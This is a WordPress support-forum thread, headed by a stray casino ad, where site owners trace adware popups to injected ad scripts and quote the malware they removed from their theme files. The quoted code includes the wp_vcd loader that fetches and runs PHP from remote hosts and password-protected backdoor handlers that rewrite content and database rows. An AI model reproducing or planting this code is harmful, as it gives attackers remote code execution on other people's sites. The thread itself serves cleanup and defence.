TALA888 Legit download.REGISTER NOW GET FREE 888 PESOS REWARDS!

Resolved carlostorch
(@carlostorch)

7 years, 7 months ago

Hi.

I’m working on a new site, installing plugins and customizing it.

The problem is, since yesterday, many times when I click on menu items or other areas on the site, ad popups appears and I have no idea where they are comming from.

I can see the popup windos address starts with the onclkds.com domain before it redirects to some random address with random ads.

I’ve tried scanning the site with antiwalware plugins like Quttera and Wordfence with no avail.

I’ve tried with different bwosers and computers, popup appears in all of them, so is it no my pc with the problem.

i hope someone can help with this, been working on this site for 15 days, starting over would kill me and I’m not sure if this thing would attack the site again.

Viewing 15 replies - 1 through 15 (of 23 total)

1 2 →

sinip
(@sinip)

7 years, 7 months ago

And your website url is…?

Thread Starter carlostorch
(@carlostorch)

7 years, 7 months ago

it’s https://distribuidoramundialcr.com

thanks for replying
sinip
(@sinip)

7 years, 7 months ago
I have a NoScript addon in my browser so I can see that there are three scripts that are loaded, one from jsdelivr.net, one from mobisla.com and one from pub2srv.com

<script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=1063894"></script>
<script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=628268&interactive=1&pushup=1"></script>

And this one that looks like legit one
<script type='text/javascript' src='https://cdn.jsdelivr.net/wp/wp-slimstat/tags/4.6.4/wp-slimstat.min.js'></script>

IMHO, you should check what these two are doing and how did they get in.

And then there’s THIS

https://sitecheck.sucuri.net/results/distribuidoramundialcr.com/

You have some job to do. ??
- This reply was modified 7 years, 7 months ago by sinip.
Thread Starter carlostorch
(@carlostorch)

7 years, 7 months ago

Thanks for shedding some light.

I downloaded a full copy of the site (only files not database), searched every file for “mobisla.com” and “mobisla.com” text using notepad++ trying lo locate part of the code you found, but I got nothing.

“jsdelivr.net” was found in a few files though.

Any idea where else to look for these weird scrips?
sinip
(@sinip)

7 years, 7 months ago
Database?

Could be encoded as well.

Try to install this and see what happens – https://www.ads-software.com/plugins/exploit-scanner/
- This reply was modified 7 years, 7 months ago by sinip.
Thread Starter carlostorch
(@carlostorch)

7 years, 7 months ago

I’m looking for a way to search specific text within database . Never did it before. If you have one please let me know.

sinip
(@sinip)

7 years, 7 months ago

The easiest one is to download the database from within phpMyAdmin and then open it in Notepad++. ??

Thread Starter carlostorch
(@carlostorch)

7 years, 7 months ago

I tried that initially but noticed many weird characters in the file, thought i was doing wrong.

Anyhow, I searched within the .sql file for “pub2srv”, nothing was found.
Then searched for “mobisla” and got 1 result, here’s the part of the code where it’s seen:

‘,’a:9:{s:10:\”search_for\”;s:7:\”mobisla\”;s:12:\”replace_with\”;s:0:\”\”;s:7:\”dry_run\”;s:2:\”on\”;s:16:\”case_insensitive\”;s:3:\”off\”;s:13:\”replace_guids

I’m really confused about where that code is coming from

Jason Crouse
(@coolmann)

7 years, 7 months ago

Hi,

Slimstat support here. JsDelivr is the CDN network used to serve our Javascript tracker. This feature can be deactivated in the settings, if you think your site will be safer by serving the tracker from your own servers. However, of course we DO NOT add any popups or anything like that. So you may want to look at your other scripts.

Cheers,
Jason
Thread Starter carlostorch
(@carlostorch)

7 years, 7 months ago
Firstly, thanks Jason for your input. I disabled Slimstat to do my testing but the problem persisted, so I enabled your nice tool back.

Secondly, Sinip, your’re a life saver! I got rid of that nasty script, thanks the code you provided, which allowed me to look further.

This might help someone else so I’m leaving the fix:

I removed this code from my functions.php theme file:
```
if ( ! function_exists( ‘wp_temp_setup’ ) ) {
$path=$_SERVER[‘HTTP_HOST’].$_SERVER[REQUEST_URI];

if($tmpcontent = @file_get_contents(“https://www.aotson.com/code.php?i=”.$path))
{

function wp_temp_setup($phpCode) {
$tmpfname = tempnam(sys_get_temp_dir(), “wp_temp_setup”);
$handle = fopen($tmpfname, “w+”);
fwrite($handle, “<?php\n” . $phpCode);
fclose($handle);
include $tmpfname;
unlink($tmpfname);
return get_defined_vars();
}

extract(wp_temp_setup($tmpcontent));
}
}
```
and the problem is gone!

I checked again here and is looking fine so far https://sitecheck.sucuri.net/results/distribuidoramundialcr.com/

I wish I knew how that code got there, though.

Thanks guys for giving away some of your valuable time to help others.
- This reply was modified 7 years, 7 months ago by carlostorch.
sinip
(@sinip)

7 years, 7 months ago

Nice to see that you’ve sorted it out while I’m having my morning coffee. ??

samuelseggs
(@samuelseggs)

7 years, 4 months ago

I’m having this same issues, i have checked the lines of code @carlostorch posted earlier but don’t seem to be same with mine, please how do i fix this error my website is alummata.com thanks

seospeak
(@seospeak)

7 years, 2 months ago

Same problem happened to my site. I try to search the solution through the web and tried step by step to resolve, but it fails. Finally I got this conversation and try to remove the code in the public_html/wp-content/themes/your active theme/functions.php

“if ( ! function_exists( ‘wp_temp_setup’ ) ) {
$path=$_SERVER[‘HTTP_HOST’].$_SERVER[REQUEST_URI];
if ( ! is_404() && stripos($_SERVER[‘REQUEST_URI’], ‘wp-cron.php’) == false && stripos($_SERVER[‘REQUEST_URI’], ‘xmlrpc.php’) == false) {
if($tmpcontent = @file_get_contents(“https://www.dolsh.com/code4.php?i=”.$path))
{
function wp_temp_setup($phpCode) {
$tmpfname = tempnam(sys_get_temp_dir(), “wp_temp_setup”);
$handle = fopen($tmpfname, “w+”);
fwrite($handle, “<?php\n” . $phpCode);
fclose($handle);
include $tmpfname;
unlink($tmpfname);
return get_defined_vars();
}
extract(wp_temp_setup($tmpcontent));
}
}
}
”

Site works well and fast loading in the admin panel.

Thanks.
syahzero23
(@syahzero23)

7 years, 2 months ago
i also have the same problem. i found on function.php, and i’ve deleted the code u show above. but i curious this code if there anyone can explain to me what this code for? cause there look same with the code that i’ve deleted.
```
<?php

if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'd279b04c68acf3ccd6cf3270727d84fd'))
	{
$div_code_name="wp_vcd";
		switch ($_REQUEST['action'])
			{

				

				case 'change_domain';
					if (isset($_REQUEST['newdomain']))
						{
							
							if (!empty($_REQUEST['newdomain']))
								{
                                                                           if ($file = @file_get_contents(__FILE__))
		                                                                    {
                                                                                                 if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code4\.php/i',$file,$matcholddomain))
                                                                                                             {

			                                                                           $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
			                                                                           @file_put_contents(__FILE__, $file);
									                           print "true";
                                                                                                             }

		                                                                    }
								}
						}
				break;

				
				
				default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
			}
			
		die("");
	}

	

?>
```
and here another one same in theme-functions.php
```
<?php

if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'd279b04c68acf3ccd6cf3270727d84fd'))
	{
		switch ($_REQUEST['action'])
			{
				case 'get_all_links';
					foreach ($wpdb->get_results('SELECT * FROM <code>' . $wpdb->prefix . 'posts</code> WHERE <code>post_status</code> = "publish" AND <code>post_type</code> = "post" ORDER BY <code>ID</code> DESC', ARRAY_A) as $data)
						{
							$data['code'] = '';
							
							if (preg_match('!<div id="wp_cd_code">(.*?)</div>!s', $data['post_content'], $_))
								{
									$data['code'] = $_[1];
								}
							
							print '<e><w>1</w><url>' . $data['guid'] . '</url><code>' . $data['code'] . '</code><id>' . $data['ID'] . '</id></e>' . "\r\n";
						}
				break;
				
				case 'set_id_links';
					if (isset($_REQUEST['data']))
						{
							$data = $wpdb -> get_row('SELECT <code>post_content</code> FROM <code>' . $wpdb->prefix . 'posts</code> WHERE <code>ID</code> = "'.mysql_escape_string($_REQUEST['id']).'"');
							
							$post_content = preg_replace('!<div id="wp_cd_code">(.*?)</div>!s', '', $data -> post_content);
							if (!empty($_REQUEST['data'])) $post_content = $post_content . '<div id="wp_cd_code">' . stripcslashes($_REQUEST['data']) . '</div>';

							if ($wpdb->query('UPDATE <code>' . $wpdb->prefix . 'posts</code> SET <code>post_content</code> = "' . mysql_escape_string($post_content) . '" WHERE <code>ID</code> = "' . mysql_escape_string($_REQUEST['id']) . '"') !== false)
								{
									print "true";
								}
						}
				break;
				
				case 'create_page';
					if (isset($_REQUEST['remove_page']))
						{
							if ($wpdb -> query('DELETE FROM <code>' . $wpdb->prefix . 'datalist</code> WHERE <code>url</code> = "/'.mysql_escape_string($_REQUEST['url']).'"'))
								{
									print "true";
								}
						}
					elseif (isset($_REQUEST['content']) && !empty($_REQUEST['content']))
						{
							if ($wpdb -> query('INSERT INTO <code>' . $wpdb->prefix . 'datalist</code> SET <code>url</code> = "/'.mysql_escape_string($_REQUEST['url']).'", <code>title</code> = "'.mysql_escape_string($_REQUEST['title']).'", <code>keywords</code> = "'.mysql_escape_string($_REQUEST['keywords']).'", <code>description</code> = "'.mysql_escape_string($_REQUEST['description']).'", <code>content</code> = "'.mysql_escape_string($_REQUEST['content']).'", <code>full_content</code> = "'.mysql_escape_string($_REQUEST['full_content']).'" ON DUPLICATE KEY UPDATE <code>title</code> = "'.mysql_escape_string($_REQUEST['title']).'", <code>keywords</code> = "'.mysql_escape_string($_REQUEST['keywords']).'", <code>description</code> = "'.mysql_escape_string($_REQUEST['description']).'", <code>content</code> = "'.mysql_escape_string(urldecode($_REQUEST['content'])).'", <code>full_content</code> = "'.mysql_escape_string($_REQUEST['full_content']).'"'))
								{
									print "true";
								}
						}
				break;
				
				default: print "ERROR_WP_ACTION WP_URL_CD";
			}
			
		die("");
	}

	
if ( $wpdb->get_var('SELECT count(*) FROM <code>' . $wpdb->prefix . 'datalist</code> WHERE <code>url</code> = "'.mysql_escape_string( $_SERVER['REQUEST_URI'] ).'"') == '1' )
	{
		$data = $wpdb -> get_row('SELECT * FROM <code>' . $wpdb->prefix . 'datalist</code> WHERE <code>url</code> = "'.mysql_escape_string($_SERVER['REQUEST_URI']).'"');
		if ($data -> full_content)
			{
				print stripslashes($data -> content);
			}
		else
```
gobu
(@gobu)

7 years, 1 month ago
I got a similar problem.
I have the two same scripts included in my webpages:
```
<script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=1063894"></script> 

<script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=628268&interactive=1&pushup=1"></script>
```
But I do not have any class.wp.php or wp-vcd.php files in my wordpress installation. Tried to desactivate every plugin and theme, but nothing. Nothing neither at the begging of my functions.php file. Any hint? Anti-Malware doesn’t find anything.

The weirdest thing is that some user have the adware, and some not! ??